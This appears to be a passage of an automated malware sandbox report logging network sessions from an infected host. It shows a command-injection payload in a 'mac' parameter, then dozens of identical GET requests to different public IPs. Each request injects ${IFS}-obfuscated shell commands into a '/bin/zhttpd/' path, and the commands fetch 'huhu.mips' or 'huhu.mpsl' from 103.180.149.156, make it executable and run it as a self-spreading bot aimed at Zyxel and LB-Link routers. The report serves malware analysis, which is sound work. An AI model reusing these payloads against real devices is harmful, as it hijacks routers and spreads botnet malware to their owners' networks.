                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:04.111486912 CET103INHTTP/1.1 404 Not Found
                                                      Content-Type: text/plain
                                                      Content-Length: 30
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6958192.168.2.1451760202.98.232.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862036943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6959192.168.2.143755461.43.41.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862081051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6960192.168.2.14343241.124.210.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862135887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6961192.168.2.1450740160.184.16.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862178087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6962192.168.2.14447742.218.195.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862224102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6963192.168.2.144550846.205.194.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862251043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6964192.168.2.144345282.198.108.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862297058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6965192.168.2.145721817.70.15.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862344027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6966192.168.2.145030658.181.139.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862399101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6967192.168.2.1460856177.150.109.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862448931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6968192.168.2.1433610223.2.140.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862484932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6969192.168.2.1454824207.242.189.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862529993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6970192.168.2.1439832203.168.245.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862575054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6971192.168.2.1446558174.97.205.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862620115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6972192.168.2.1437970175.173.59.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862670898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6973192.168.2.144668475.245.98.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862704992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6974192.168.2.1446070138.56.123.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862734079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6975192.168.2.1455364121.209.47.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862770081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6976192.168.2.1436786135.201.124.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862807035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6977192.168.2.1445890115.210.74.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862854004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6978192.168.2.1453378211.191.47.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862881899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6979192.168.2.1439936172.239.67.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.862951040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6980192.168.2.144811231.70.48.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863001108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6981192.168.2.144756232.116.197.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863028049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6982192.168.2.1451630176.27.131.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863059044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6983192.168.2.1444870186.155.245.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863110065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6984192.168.2.144094649.241.125.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863156080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6985192.168.2.1442198126.212.189.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863197088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6986192.168.2.144419098.42.137.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863248110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6987192.168.2.1445900170.131.46.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863285065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6988192.168.2.1438924167.9.179.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863342047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6989192.168.2.1435918174.155.188.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863393068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6990192.168.2.144341214.17.252.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863441944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6991192.168.2.1447468195.164.127.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863475084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6992192.168.2.1458948213.211.21.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863502979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6993192.168.2.14334041.42.195.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863547087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6994192.168.2.143285270.40.87.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863606930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6995192.168.2.143663883.153.92.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863653898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6996192.168.2.143297466.250.198.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863699913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6997192.168.2.145328283.232.240.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863715887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6998192.168.2.1451926201.107.98.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863780975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6999192.168.2.145236614.72.96.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863790035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7000192.168.2.1456330171.202.36.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863790035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7001192.168.2.144157646.50.232.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863852978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7002192.168.2.1459394120.110.195.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863903046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7003192.168.2.1440904153.0.137.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.863970995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7004192.168.2.143856851.86.111.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864000082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7005192.168.2.143633247.111.243.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864031076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7006192.168.2.1442690167.107.195.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864082098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7007192.168.2.1439026204.180.229.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864131927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7008192.168.2.1441136193.97.161.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864185095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7009192.168.2.1441840101.33.247.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864202976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7010192.168.2.1436802220.223.222.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864233971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7011192.168.2.1459370163.40.45.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864286900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7012192.168.2.1437058122.94.211.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864329100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7013192.168.2.1456444149.226.103.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864358902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7014192.168.2.1450990161.222.161.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864420891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7015192.168.2.143532617.118.3.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864471912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7016192.168.2.1459990115.239.181.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864511013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7017192.168.2.143716866.34.213.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.864556074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7018192.168.2.1448726111.37.30.63443
                                                      TimestampBytes transferredDirectionData
